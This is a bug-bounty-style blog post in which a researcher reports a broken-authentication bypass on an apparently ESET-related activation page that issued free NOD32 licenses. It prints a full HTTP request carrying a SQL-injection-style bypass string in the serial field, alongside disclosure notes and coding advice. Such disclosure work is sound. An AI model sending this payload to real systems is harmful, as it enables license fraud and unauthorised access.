A Hilarious ESET Broken Authentication Vulnerability (one click free purchase)

eset-nod32-antivirus-banner

Hello Geeks and Security Evangelists,

My name is Mohamed Abdelbaset Elnoby, Just another Senior Information Security Researcher and Web Application Pentester in the world 😀 , Today I would like to show you a “hilarious” Broken Authentication bug I found in ESET website specifically in their “Antivirus Product Activation Process” that allowed me to generate millions of valid paid Licenses of  “ESET Nod32 Antivirus” as per their description “Our award-winning security software offers the most effective protection available today” for free.
(Yes “hilarious” is in bold, it’s not a formatting mistake but you will know why at the end of the story)

 

What is Broken Authentication?!

While most applications require authentication to gain access to private information or to execute tasks, not every authentication method is able to provide adequate security. Negligence, ignorance, or simple understatement of security threats often result in authentication schemes that can be bypassed by simply skipping the log in page and directly calling an internal page that is supposed to be accessed only after authentication has been performed.

In addition, it is often possible to bypass authentication measures by tampering with requests and tricking the application into thinking that the user is already authenticated. This can be accomplished either by modifying the given URL parameter, by manipulating the form, or by counterfeiting sessions.

Problems related to the authentication schema can be found at different stages of the software development life cycle (SDLC), like the design, development, and deployment phases:

  • In the design phase errors can include a wrong definition of application sections to be protected, the choice of not applying strong encryption protocols for securing the transmission of credentials, and many more.
  • In the development phase errors can include the incorrect implementation of input validation functionality or not following the security best practices for the specific language.
  • In the application deployment phase, there may be issues during the application setup (installation and configuration activities) due to a lack in required technical skills or due to the lack of good documentation.

 

Black Box testing:

There are several methods of bypassing the authentication schema that is used by a web application:

  • Direct page request (forced browsing)
  • Parameter modification
  • Session ID prediction
  • SQL injection

 

 

Here’s in-depth details:

[*] Vulnerability Type : A2 – Broken Authentication and Session Management
[*] URL / Service: http://eu-eset.com/me/activate/reg/
[*] Vulnerable Parameter(s) / Input(s): “serial” (Product Key field)
[*] Payload / Bypass string: ‘ OR ”’
[*] Request full dump:

POST /me/activate/reg/ HTTP/1.1
Host: eu-eset.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eu-eset.com/me/activate/
Cookie: [*]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------25242107630722
Content-Length: 885

-----------------------------25242107630722
Content-Disposition: form-data; name="serial"

' OR '''
-----------------------------25242107630722
Content-Disposition: form-data; name="country"

20
-----------------------------25242107630722
Content-Disposition: form-data; name="firstname"

Mohamed
-----------------------------25242107630722
Content-Disposition: form-data; name="lastname"

Abdelbaset
-----------------------------25242107630722
Content-Disposition: form-data; name="company"

Seekurity
-----------------------------25242107630722
Content-Disposition: form-data; name="email"

SymbianSyMoh@Outlook.com
-----------------------------25242107630722
Content-Disposition: form-data; name="phone"

12345678911
-----------------------------25242107630722
Content-Disposition: form-data; name="note"

-----------------------------25242107630722--

 

 

Result!!

Each time you send the above request with the bypass string, guess what?! you will receive a free paid license of ESET Nod32 valid for 1 Year!! (Actually the yearly subscription costs a $29.00 per user/request)
@SymbianSyMoh_2015.05.11_09h28m05s_013_

 

[*] Proof of Concept Video:

 

What to do?!

All what i need to do is to create a detailed report and address this “catastrophic” bug under their Responsible Disclosure rules and already did, but what is the previously mentioned “hilarious” thing here?!! :v

[*] Screenshots are louder than speech 😀

#1
@SymbianSyMoh_2015.05.11_07h29m27s_011_

#2
@SymbianSyMoh_2015.05.11_07h30m06s_012_

Behind the Scene!!

As this is a black-box testing and there is nothing interested printed out as an output, I can’t even predict what was happening in the back-end but it’s a good thing at least for a bug hunter 😀 assuming that this is maybe a Full Blind SQL Injection, an authentication bypass or even a broken authentication issue (the last one is more realistic one) but what I’m sure of is that in a parallel world there is a programmer having much of beer while handling the “If statement checks, input filtration and database querying” and he got drunk enough to be trapped into my bypass.

 

[*] Nothing to be said here but rules is rules and must be respected, Thanks Daniel but i will keep my sense of humor for my CV 😀

Conclusion…

For my dear programmers friends, Don’t trust user supplied inputs “filter all the things”, Stored procedures are safer, RTFM and finally don’t drink beer while coding, Peace. 😀

[**Update**]

ESET accused my report as an invalid report “after being accepted and rewarded #badass_logic” as this reported backend “eu-eset.com” is a phishing website.

The below screenshot reflects how confusion that ESET’s experts are suffering from during the report.

So if that’s really true and let’s argue on that this is true, Then:
1. Kudos to me that I have discovered a vulnerability in a website was built by a people was a good in “something” arguably “phishing” and still kick ESET’s ass by generating a valid Licenses.
2. More shame on ESET, they were being fucked by this “phishing website” till the moment I reported them because that “phishing website” is generating “by my bypass” an actual paid valid license of their “award-winning product” for free, Here’s another proof on what I’m saying here:


Have a good day, Gentlemen

References:

Broken_Authentication_and_Session_Management
Top_10_2013-A2-Broken_Authentication_and_Session_Management
Testing_for_Bypassing_Authentication_Schema

Contact me at:

Facebook
Twitter
LinkedIn

Also read...

Comments

  1. Pingback: Vulnerability in ESET NOD32 Licence Activation generates unlimited usernames and passwords for free | Technology News: breaking news and analysis on computing, the web, blogs, games, gadgets, social media, broadband and more.

  2. Pingback: 1p – SQL injection in ESET website allows free NOD32 license | OnAdvertise.com

  3. Pingback: 1p – SQL injection in ESET website allows free NOD32 license | Profit Goals

  4. Pingback: 1p – SQL injection in ESET website allows free NOD32 license | Exploding Ads

  5. Pingback: Tech News / SQL injection in ESET website allows free NOD32 license

  6. Pingback: ¡Antivirus gratis! | El blog de Ronald

Comments are closed.